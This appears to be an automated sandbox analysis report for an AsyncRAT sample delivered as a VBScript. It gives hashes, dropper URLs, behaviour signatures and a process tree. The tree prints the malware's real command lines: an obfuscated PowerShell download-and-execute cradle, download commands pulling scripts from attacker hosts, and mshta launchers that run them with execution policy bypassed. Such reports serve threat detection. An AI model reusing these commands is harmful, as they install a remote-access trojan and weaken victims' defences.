asyncrat | 32696fdc1973162602638cdec277dde152bf855ee4be61a47258fd7b09354b65

Analysis

max time kernel
87s
max time network
149s
platform
windows10_x64
resource
win10v20210410
submitted
04-05-2021 06:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GK58.vbs
Size

436B
MD5

a3f4ec37e400752adb85a34e63560be8
SHA1

b20367d00c0bd8ed3f9df0838c237267b7694a84
SHA256

32696fdc1973162602638cdec277dde152bf855ee4be61a47258fd7b09354b65
SHA512

93f0b8cb8d08d03510f5a4ccf7470bf3620df2da8f7e77cc4790cefbae461ee9ff5fb3b4961adf40061264e1032e09165078d433f3d4805f9a9f419f8ea8b1a1

Score

10^/10

asyncrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://teammagical.com/3.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/t-ool/11.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/t-ool/Defender.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/t-ool/DefenderKill.lnk

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/t-ool/Kill.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/def/GoogleUpdate.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://teammagical.com/2.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://lax007.hawkhost.com/~mazennet/def/Dicord.lnk

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1044-251-0x000000000040D0AE-mapping.dmp	asyncrat
behavioral2/memory/3844-260-0x000000000040D0AE-mapping.dmp	asyncrat

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
8	1440	powershell.exe
17	1440	powershell.exe
19	1440	powershell.exe
22	1332	powershell.exe
23	3076	powershell.exe
24	1768	powershell.exe
25	3124	powershell.exe
26	3640	powershell.exe
27	3232	powershell.exe
28	2648	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 1652 set thread context of 1044	1652	powershell.exe	MSBuild.exe
PID 2044 set thread context of 3844	2044	powershell.exe	MSBuild.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1440	powershell.exe
1440	powershell.exe
1440	powershell.exe
2856	powershell.exe
2856	powershell.exe
2856	powershell.exe
1332	powershell.exe
1332	powershell.exe
1332	powershell.exe
3076	powershell.exe
3076	powershell.exe
3076	powershell.exe
1768	powershell.exe
1768	powershell.exe
1768	powershell.exe
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe
1652	powershell.exe
1652	powershell.exe
1652	powershell.exe
3640	powershell.exe
3640	powershell.exe
3640	powershell.exe
3232	powershell.exe
3232	powershell.exe
3232	powershell.exe
2648	powershell.exe
2648	powershell.exe
2648	powershell.exe
1652	powershell.exe
1652	powershell.exe
1652	powershell.exe
2044	powershell.exe
2044	powershell.exe
2044	powershell.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeIncreaseQuotaPrivilege	1652	powershell.exe
Token: SeSecurityPrivilege	1652	powershell.exe
Token: SeTakeOwnershipPrivilege	1652	powershell.exe
Token: SeLoadDriverPrivilege	1652	powershell.exe
Token: SeSystemProfilePrivilege	1652	powershell.exe
Token: SeSystemtimePrivilege	1652	powershell.exe
Token: SeProfSingleProcessPrivilege	1652	powershell.exe
Token: SeIncBasePriorityPrivilege	1652	powershell.exe
Token: SeCreatePagefilePrivilege	1652	powershell.exe
Token: SeBackupPrivilege	1652	powershell.exe
Token: SeRestorePrivilege	1652	powershell.exe
Token: SeShutdownPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeSystemEnvironmentPrivilege	1652	powershell.exe
Token: SeRemoteShutdownPrivilege	1652	powershell.exe
Token: SeUndockPrivilege	1652	powershell.exe
Token: SeManageVolumePrivilege	1652	powershell.exe
Token: 33	1652	powershell.exe
Token: 34	1652	powershell.exe
Token: 35	1652	powershell.exe
Token: 36	1652	powershell.exe
Token: SeIncreaseQuotaPrivilege	1652	powershell.exe
Token: SeSecurityPrivilege	1652	powershell.exe
Token: SeTakeOwnershipPrivilege	1652	powershell.exe
Token: SeLoadDriverPrivilege	1652	powershell.exe
Token: SeSystemProfilePrivilege	1652	powershell.exe
Token: SeSystemtimePrivilege	1652	powershell.exe
Token: SeProfSingleProcessPrivilege	1652	powershell.exe
Token: SeIncBasePriorityPrivilege	1652	powershell.exe
Token: SeCreatePagefilePrivilege	1652	powershell.exe
Token: SeBackupPrivilege	1652	powershell.exe
Token: SeRestorePrivilege	1652	powershell.exe
Token: SeShutdownPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeSystemEnvironmentPrivilege	1652	powershell.exe
Token: SeRemoteShutdownPrivilege	1652	powershell.exe
Token: SeUndockPrivilege	1652	powershell.exe
Token: SeManageVolumePrivilege	1652	powershell.exe
Token: 33	1652	powershell.exe
Token: 34	1652	powershell.exe
Token: 35	1652	powershell.exe
Token: 36	1652	powershell.exe
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	1044	MSBuild.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

WScript.exepowershell.exeWScript.exepowershell.exepowershell.execmd.exemshta.execmd.exemshta.exepowershell.execmd.exemshta.exepowershell.exe

description	pid	process	target process
PID 3988 wrote to memory of 1440	3988	WScript.exe	powershell.exe
PID 3988 wrote to memory of 1440	3988	WScript.exe	powershell.exe
PID 1440 wrote to memory of 1464	1440	powershell.exe	WScript.exe
PID 1440 wrote to memory of 1464	1440	powershell.exe	WScript.exe
PID 1464 wrote to memory of 2856	1464	WScript.exe	powershell.exe
PID 1464 wrote to memory of 2856	1464	WScript.exe	powershell.exe
PID 2856 wrote to memory of 1332	2856	powershell.exe	powershell.exe
PID 2856 wrote to memory of 1332	2856	powershell.exe	powershell.exe
PID 2856 wrote to memory of 3076	2856	powershell.exe	powershell.exe
PID 2856 wrote to memory of 3076	2856	powershell.exe	powershell.exe
PID 2856 wrote to memory of 1768	2856	powershell.exe	powershell.exe
PID 2856 wrote to memory of 1768	2856	powershell.exe	powershell.exe
PID 2856 wrote to memory of 3124	2856	powershell.exe	powershell.exe
PID 2856 wrote to memory of 3124	2856	powershell.exe	powershell.exe
PID 2856 wrote to memory of 2124	2856	powershell.exe	powershell.exe
PID 2856 wrote to memory of 2124	2856	powershell.exe	powershell.exe
PID 2124 wrote to memory of 2272	2124	powershell.exe	cmd.exe
PID 2124 wrote to memory of 2272	2124	powershell.exe	cmd.exe
PID 2272 wrote to memory of 2668	2272	cmd.exe	mshta.exe
PID 2272 wrote to memory of 2668	2272	cmd.exe	mshta.exe
PID 2668 wrote to memory of 1652	2668	mshta.exe	powershell.exe
PID 2668 wrote to memory of 1652	2668	mshta.exe	powershell.exe
PID 1440 wrote to memory of 3640	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 3640	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 3232	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 3232	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 2648	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 2648	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 2108	1440	powershell.exe	cmd.exe
PID 1440 wrote to memory of 2108	1440	powershell.exe	cmd.exe
PID 2108 wrote to memory of 780	2108	cmd.exe	mshta.exe
PID 2108 wrote to memory of 780	2108	cmd.exe	mshta.exe
PID 780 wrote to memory of 1652	780	mshta.exe	powershell.exe
PID 780 wrote to memory of 1652	780	mshta.exe	powershell.exe
PID 1652 wrote to memory of 1044	1652	powershell.exe	MSBuild.exe
PID 1652 wrote to memory of 1044	1652	powershell.exe	MSBuild.exe
PID 1652 wrote to memory of 1044	1652	powershell.exe	MSBuild.exe
PID 1652 wrote to memory of 1044	1652	powershell.exe	MSBuild.exe
PID 1652 wrote to memory of 1044	1652	powershell.exe	MSBuild.exe
PID 1652 wrote to memory of 1044	1652	powershell.exe	MSBuild.exe
PID 1652 wrote to memory of 1044	1652	powershell.exe	MSBuild.exe
PID 1652 wrote to memory of 1044	1652	powershell.exe	MSBuild.exe
PID 1440 wrote to memory of 1196	1440	powershell.exe	cmd.exe
PID 1440 wrote to memory of 1196	1440	powershell.exe	cmd.exe
PID 1196 wrote to memory of 3260	1196	cmd.exe	mshta.exe
PID 1196 wrote to memory of 3260	1196	cmd.exe	mshta.exe
PID 3260 wrote to memory of 2044	3260	mshta.exe	powershell.exe
PID 3260 wrote to memory of 2044	3260	mshta.exe	powershell.exe
PID 2044 wrote to memory of 3844	2044	powershell.exe	MSBuild.exe
PID 2044 wrote to memory of 3844	2044	powershell.exe	MSBuild.exe
PID 2044 wrote to memory of 3844	2044	powershell.exe	MSBuild.exe
PID 2044 wrote to memory of 3844	2044	powershell.exe	MSBuild.exe
PID 2044 wrote to memory of 3844	2044	powershell.exe	MSBuild.exe
PID 2044 wrote to memory of 3844	2044	powershell.exe	MSBuild.exe
PID 2044 wrote to memory of 3844	2044	powershell.exe	MSBuild.exe
PID 2044 wrote to memory of 3844	2044	powershell.exe	MSBuild.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GK58.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://teammagical.com/3.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\ss.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/t-ool/11.txt', 'C:\Users\Public\11.ps1') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/t-ool/Defender.bat', 'C:\Users\Public\Defender.bat') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/t-ool/DefenderKill.lnk', 'C:\Users\Public\DefenderKill.lnk') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/t-ool/Kill.txt', 'C:\Users\Public\Kill.ps1') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\Kill.ps1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Defender.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\11.ps1'"", 0:close")
7⤵
- Suspicious use of WriteProcessMemory
PID:2668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\11.ps1'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/def/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://teammagical.com/2.txt', 'C:\Users\Public\msi.ps1') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://lax007.hawkhost.com/~mazennet/def/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\GoogleUpdate.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2108

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(StrReverse(""llehS.tpircSW"")).Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'"", 0:close")
4⤵
- Suspicious use of WriteProcessMemory
PID:780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1652

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#cmd
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\GoogleUpdate.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1196

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(StrReverse(""llehS.tpircSW"")).Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'"", 0:close")
4⤵
- Suspicious use of WriteProcessMemory
PID:3260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#cmd
6⤵
PID:3844

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft Arts\Start\Dicord.lnk
MD5
ce592d7b323596c62e25c58305fbd1f1

SHA1
a582b2c867d054bfc436ac04aa8b626a6e7c886b

SHA256
8cf9b48967283e8d15012c6f9438280841bb94baf499a91647922f28eab37619

SHA512
0b5640a2261fbb5bcdb60dee6b6178b2c451cce411d8b8791c8d6dc09e1b01a0e80d605a6e4e119453f349e4ee62340e9a3bed70dadb16a8b2fd4592facd3335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4197cd032bcf9a297ec68111852b66a1

SHA1
88209470411b3a06e956ef79d7a5ca71b9e1f405

SHA256
6a7d29735d3f5ea7fb6e15c2e316b2166d4f0d367370883b7d5158cc7ff7d224

SHA512
34ae8e07aad06ccdd73ad228ea9d925a54cf0833a5b4ac1f50305736298a6d0d46a18cfbd8015d719cd74e12e6308499986f2cc0c588f130578af5fb70210908

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
867cd385a2876d7c856fc2d8de5d69aa

SHA1
315a8e44e44538835b00dc354d44dde210a31d66

SHA256
c42d0dae4e81f822fdd0289ffac8cf308bb1e1dcc3ea52673d398b1c526cd814

SHA512
c558985c7c5e27b1904fedd89266274cfeb933d3cf97fa22a701071fb42ef62939d88438f930cdebe277109f16e5480c9bf0188b0a0970dd9d8fb01ffac00efd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
720dce2a49f8b816d2894d05602af769

SHA1
bc408ccc250882c94c3ab861d4d7ee8ff96b45b4

SHA256
7d0d1750b65d44fdbd138d0d2f5adb9700c7921561b34ed7ba15049bd1db55eb

SHA512
4d818a674010498f664bcb5ba780ddeac3c093584916205bc86210af98852715288efd2b21b7c374876e39b13961c56ee7094a7ea90636a05afa2356e9cddf06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c82ba86fc425af5eeb930560297d5a5a

SHA1
34b171d51fc55aa235209c0de35a785c222c8771

SHA256
c314ae10cb7c21648867297a968db6564920275deeb97d5d2b4d12f9ba0fb3eb

SHA512
2cd018f46517ff354bfcfaf7f706b59f9cbcb0d094e172f05d1c9c4191c6901659719ce8eda9884becdfeebb2e00092505bed424cd8bd6109ebcc0c480e425dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a43a1db21c993fbd2e651981c97c6041

SHA1
6c9035507b59f43667b56dc79ab5f49703a9c618

SHA256
c0eb6c037c6bb166183095f40be74e649fa12b1a8065e560244e898939d48cb5

SHA512
bccb78306dcc21b88914979e2e7942cc0fa8596dc8690b60f02635ddcccfc7e8766b332e0eb363a82cc218bf3988a305b00b2e7e1092865741164922823f40e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a43a1db21c993fbd2e651981c97c6041

SHA1
6c9035507b59f43667b56dc79ab5f49703a9c618

SHA256
c0eb6c037c6bb166183095f40be74e649fa12b1a8065e560244e898939d48cb5

SHA512
bccb78306dcc21b88914979e2e7942cc0fa8596dc8690b60f02635ddcccfc7e8766b332e0eb363a82cc218bf3988a305b00b2e7e1092865741164922823f40e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
7c94acf8a47731cab5e3954b55273bd8

SHA1
1eb62e9ca0466a9a03a2bc715e54c412902726e7

SHA256
be426cc7abeac24c3797aaf0ea506826f9ae97c05725880f3266a3ac06ae43d6

SHA512
7abcbe6c2a4397e8b9b644f867f25d8faa2783b6fde1aad7ba91abfea1c06c42f80d09b7de5d5b7ee9a4ffb23741ebe298c96e7080b0318bac07219c4b172b2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
cf7964cd1e3156488189402d0030b257

SHA1
3d83f70480979ac919827048e7ac3add639763f2

SHA256
5236aea173f58e9d088c2397123fb718e6d1035fabfd8ab4881c8ba2c6281590

SHA512
51837d6f5514227286c9fdd7f501561cde053189d7dae98c7e2828bff594e25b916c89b4e40ad6287f9078e2ad8e3b0a84f9967c01b9fdfdcaaf7a47db6a1a60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
98d3ceff9409efb88aa120615d705eef

SHA1
28d7e1ad1cbb770a15db7e42d330fad4df6a95d8

SHA256
2a03aef31a50fb1b033158bbaa42b8fe532a0c626476d1501162905ec5045d47

SHA512
d34f4d1c98f4c5a2b8637dc2847cecddf6101d1ee60729489c5aaafe1c94b06645fd01bb6989762a3606e460521f627226d3efcf8932f54f2ed09852ece11f54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8de28e65a64fbd21dc7f4f0859515faf

SHA1
6095050ff8ab7854aec0454c65f6091af8214260

SHA256
5e4d17d7d6f0200960882c4422fdbe02dbbbfebb6910a150706728d6c6d463da

SHA512
d3585f64d478de0026d52524cf82e64f9abaaf23f8544968e5f2eba997dc1703f71f90d2e60011d8dad8833e852b634bbf1fc2fd4c24526ba4bb47e094dcb083

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
fcedd6df19df95ad5664b2efcda71d81

SHA1
672ad9db9f2277b3ef54e072f9ba173d86d593c3

SHA256
83fc0a1fb3a8d2a0b56d37866d536b956408e63850d32cfb9b0f9b724e8f2646

SHA512
31bf344cf82da8edcf91cd067fe74a6ebb80c1506db8696f096d0febde0951db459862006779cc77b11cbc2ecf9615fe9b5a65ef1eb160263424606c4989ace7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
fcedd6df19df95ad5664b2efcda71d81

SHA1
672ad9db9f2277b3ef54e072f9ba173d86d593c3

SHA256
83fc0a1fb3a8d2a0b56d37866d536b956408e63850d32cfb9b0f9b724e8f2646

SHA512
31bf344cf82da8edcf91cd067fe74a6ebb80c1506db8696f096d0febde0951db459862006779cc77b11cbc2ecf9615fe9b5a65ef1eb160263424606c4989ace7

Download Submit
C:\Users\Public\11.ps1
MD5
d4c2856e8c22e984a62bcc8b3fcdc505

SHA1
ff4087c7806d0828bb4cf2bd57b0b546108d6fc6

SHA256
f0f9e51900e859546085bdab2088ac0e652ffc044eff8cf02e2108c8c0cdfad7

SHA512
c918680f97aac540c4f7e01e158115bec0ed52e39b6cc4176dbdb287ea5f15316d0b0a81fc5abc350fd8cc53ad29d346c121e1073825b23a92fbb130b834f89f

Download Submit
C:\Users\Public\11.ps1
MD5
f9671f50a3701099915249be9c9b519e

SHA1
c383a79653700507edf01c494f2a7ac664963711

SHA256
987b88896b23da2d57371bf1709019bee218ee72fb9a88f9afda88427570c448

SHA512
d21f67cee9d3fe56541beaab90c28335f9122abb1942a209ba6634f5f14fa75f8d43a3e0c4a11d2009a964200d06836df8245264c0922b8c46adff68d2293a41

Download Submit
C:\Users\Public\Defender.bat
MD5
bb81dd50c01d78e9359b7d8f2b99f93e

SHA1
35ecd940870508d659866d43351ebd11920b98b8

SHA256
fa94673156394c814fdab9b634ad6e327cc7e0f6cf5412f31d74103a3a6e3931

SHA512
3c29815e29a65e14f0202ddd9c83eda367535651f87332be39acfe2d0c51536cc224281b7c794f1b67a3528c293fdf76a7142b5d1c1c734ab35c664fa657f90f

Download Submit
C:\Users\Public\DefenderKill.lnk
MD5
d50605593740da71810d0dedf04281e0

SHA1
b672961b731400d653039fedcd7dfa71cc3e0179

SHA256
56ec901d7efadda7a2868abc7ff458d8177660361e5572a4806a232e46846464

SHA512
190a98490786fbdf8b189ea10697b7a6acebdaf0dcda11d7d6fde8c1df72af2fd4c5d0b2874d812e20307d609d25af354ff74ce2fd564a563b84912975f46b05

Download Submit
C:\Users\Public\GoogleUpdate.bat
MD5
311524c0e72f5c65f62bf73ffb57ee3c

SHA1
c917cb67fac476be24cd73eddafd21c7da79af15

SHA256
62da5d7a78b42aeed845e30f7360e42adb2cf77365386295ebc549d9ce0d4daa

SHA512
2d46fdb99392f85a47e1bf465f8948d1af139fda4176b3f058ad9f079a781a2167a2e7480883517cb01cb2bb675bd7dcb5f285cd957439c9119c5407fd209411

Download Submit
C:\Users\Public\Kill.ps1
MD5
2e1021023713f80d3d233d4a9467e6b2

SHA1
94ae0dd1fccbed177d354e39e99737293900b28a

SHA256
d532e0ef22db774861c441769b16edfc9df1e055423fcda74230d774ce09370a

SHA512
e9599bb5fc8766cf259dab6eaf7802f3be9a0a7da347cf93e8616d4239ef37a7d7eecb9f48d46498f4f6522cb2aa6bd2897bd8a7476c86913dc8247ddf8ace7f

Download Submit
C:\Users\Public\msi.ps1
MD5
717253ddd4be3f31c331aeae1d35bc6f

SHA1
d2e410397417485313ca94529b06adcdfa898492

SHA256
0baccf1a972f6209942a43fbd789de4574d9876001eee01e73fd6690a32fdcc0

SHA512
e5fe32177dfce5bfece3ad64594e2f3cb0456ee65e999b10c79e25ef662d8f95f395d575fa03ee41c799a1656d25acedae1664b6161257634c7a69623a956b25

Download Submit
C:\Users\Public\ss.vbs
MD5
98f69749329ccb2ee8d69288e04f2332

SHA1
3a8477b107a52cd0b96961d0666cf07ae5045d76

SHA256
771780d15b72c2d35c069cf0e7e53346f14ea6078609e7be090b5249bd040556

SHA512
372e0766f7ca026893720b42de5d34ef667723a0519210977c9ea5af275e6c82dfa3743b69e5cfeba529f9f90e1ca51644b20cfc63f9996a5450cd3da10244cf

Download Submit
memory/780-245-0x0000000000000000-mapping.dmp

Download
memory/1044-262-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/1044-251-0x000000000040D0AE-mapping.dmp

Download
memory/1196-253-0x0000000000000000-mapping.dmp

Download
memory/1332-167-0x0000024A6A8A6000-0x0000024A6A8A8000-memory.dmp

Filesize
8KB

Download
memory/1332-166-0x0000024A6A8A3000-0x0000024A6A8A5000-memory.dmp

Filesize
8KB

Download
memory/1332-165-0x0000024A6A8A0000-0x0000024A6A8A2000-memory.dmp

Filesize
8KB

Download
memory/1332-152-0x0000000000000000-mapping.dmp

Download
memory/1440-129-0x000002B147696000-0x000002B147698000-memory.dmp

Filesize
8KB

Download
memory/1440-124-0x000002B147B10000-0x000002B147B11000-memory.dmp

Filesize
4KB

Download
memory/1440-122-0x000002B147690000-0x000002B147692000-memory.dmp

Filesize
8KB

Download
memory/1440-114-0x0000000000000000-mapping.dmp

Download
memory/1440-123-0x000002B147693000-0x000002B147695000-memory.dmp

Filesize
8KB

Download
